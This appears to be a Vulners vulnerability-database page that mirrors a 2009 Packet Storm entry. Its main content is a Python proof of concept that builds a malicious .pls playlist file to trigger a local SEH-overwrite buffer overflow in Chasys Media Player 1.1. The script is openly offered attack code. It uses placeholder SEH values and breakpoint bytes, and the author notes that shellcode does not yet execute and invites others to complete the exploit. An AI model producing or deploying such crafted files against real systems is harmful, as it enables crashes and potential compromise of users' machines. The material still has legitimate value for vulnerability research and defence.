Lucene search
+L

Chasys Media Player 1.1 Buffer Overflow

🗓️ 19 Mar 2009 00:00:00Reported by zAxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Chasys Media Player 1.1 Buffer Overflow, Local SEH Overwrite, Exploit Po

Code
`#!/usr/bin/python  
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC  
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!  
# I have tried a lot of Addresses .  
# Waitting for the Exploit from someone .  
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip  
print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"  
print " Discovered By : zAx"  
print " Contact : [email protected]"  
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"  
junk = "\x41"*2024  
next_seh = "\x42"*4  
seh = "\x43"*4  
other_data = "\xCC"*800  
ex = header + junk + next_seh + seh + other_data  
file=open("zAx.pls","w")  
file.write(ex)  
file.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2009 00:00Current
0.8Low risk
Vulners AI Score0.8
22